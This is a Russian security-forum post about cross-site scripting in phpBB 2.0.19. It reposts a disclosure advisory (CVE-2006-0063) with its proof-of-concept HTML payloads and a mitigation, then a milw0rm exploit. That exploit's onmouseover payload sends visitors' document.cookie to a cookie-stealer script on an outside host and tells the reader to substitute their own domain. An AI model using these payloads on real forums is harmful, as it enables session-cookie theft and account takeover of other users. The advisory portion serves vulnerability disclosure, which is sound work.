Форум АНТИЧАТ - Очередной вопрос об уязвимостях в phpbb 2.0.19

PHP код:


		
			
Details: SecurityAlert 

   Topic : phpBB 2.0.19 XSS

   SecurityAlert Id : 30

   SecurityRisk : Medium

   Remote Exploit : Yes

   Local Exploit : No

   Exploit Given : Yes

   Credit : Maksymilian Arciemowicz

   Date : 5.1.2006 



  Affected Software :  phpBB 2.0.19 and prior 





  Advisory Text :

    -----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1



[phpBB 2.0.19 XSS cXIb8O3.23]



Author: Maksymilian Arciemowicz (cXIb8O3)

Date: 6.1.2006

from SecurityReason.Com

CVE : CVE-2006-0063



- --- 0.Description ---

phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board

package. phpBB has a user-friendly interface, simple and straightforward administration

panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL,

MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community

solution for all web sites.

Contact with author http://www.phpbb.com/about.php.



- --- 1. XSS ---

If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile

"Always allow HTML: YES" or are you Guest



This issue is in phpBB 2.0.19 .

Some Details :

Old exploit for x <= 2.0.18 was (http://securityreason.com/achievement_securityalert/29) :

<B C=">" onmouseover="alert('SecurityReason.Com')" X="<B

"> H E L O </B>



New exploit for x <= 2.0.19 is :

<B C='>' onmouseover='alert("SecurityReason.Com")' X='<B '>

SecurityReason.Com </B>



The exploits are simillar but not the same ! As you can notice the " is replaced to '

In new version phpBB they only filter " but not '



that you can use this tags:



<B C='>' onmouseover='alert("SecurityReason.Com")' X='<B '>

SecurityReason.Com </B>



Exploit:



<B C='>' onmouseover='alert(document.location="http://SecurityReason.Com")'

X='<B '> SecurityReason.Com </B>





- ---

SecurityReason Note :



According to http://www.phpbb.com/phpBB/viewtopic.php?t=352966

[Sec] fixed XSS issue (only valid for Internet Explorer) within the url bbcode 

[Sec] fixed XSS issue (only valid for Internet Explorer) if html tags are allowed and enabled



SecurityReason tested this issue before public advisory :

http://securityreason.com/achievement_securityalert/29

and the XSS is working on : 



- -> Mozilla

- -> Internet Explorer ( so !not! only valid Internet Explorer) 

- -> Opera 

- -> Firefox 

- -> Links

As proof SecurityReason show examples of working XSS on screens :

http://securityreason.com/downloads/mozilla.png -> Mozilla 

http://securityreason.com/downloads/opera.png -> Opera 

http://securityreason.com/downloads/firefox.png -> Firefox 

http://securityreason.com/downloads/links.png -> Links

- ---



We have reported this bug to phpbb bugtraq and:



phpBB Team respone :

- --------------------

...

we do not intended to fix the previous issue in 2.0.19 (it was just preventing it by the

quote change, which was good - but we intended this change

because of other forseeable issues) - and i do not intend to fix this one. HTML is and was

always "bad" and has been stated as being

able to be entered "as is". In olympus we will therefore remove html support

completely

...

- --------------------





So Solusion is:



phpBB Team respone :

- -------------------

I already said we will fix it in CVS but do not see the need to release a new version

immediatly. 

- -------------------



So there is no fix for this .

Only way to protect is :



Allow HTML = Off



- --- 2. Greets ---

sp3x



- --- 3.Contact ---

Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]

Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com

GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

SecurityReason.Com

-----BEGIN PGP SIGNATURE-----

Version: GnuPG v1.4.2 (FreeBSD)



iD8DBQFDvSzX3Ke13X/fTO4RAqlOAJ9eX7rok/p3Q0VHmYP8J21h26PvpgCbBGmJ

mGGvK34tnNCl1WdnpZxfAcY=

=dyrx

-----END PGP SIGNATURE-----

PHP код:


		
			
# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103

# Make sure you change www.milw0rm.com to your domain. thnx. /str0ke

# Author: threesixthousan 



/*

As long as html is ON in the latest version of phpBB forums, 

several XSS attack vectors are possible. phpBB incorrectly 

filters in both messages and profiles, making cookie stealing, 

and other XSS attacks possible. the exploit leads to arbitary 

javascript execution, which in turn can lead to html defacement.



use of the <pre> tag means that the cursor must pass it in the y 

direction only. e.g. the mouse only needs to cross a point 

horrizontaly equal to the link in order for the javascript to be executed.



the following is a simple attack:

*/



<pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cookie' b='<pre' >



[url]http://www.somesite.com/[/url]</pre>



# milw0rm.com [2006-01-29]

_http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/041920.html
_http://www.fr33d0m.net/content-2496.html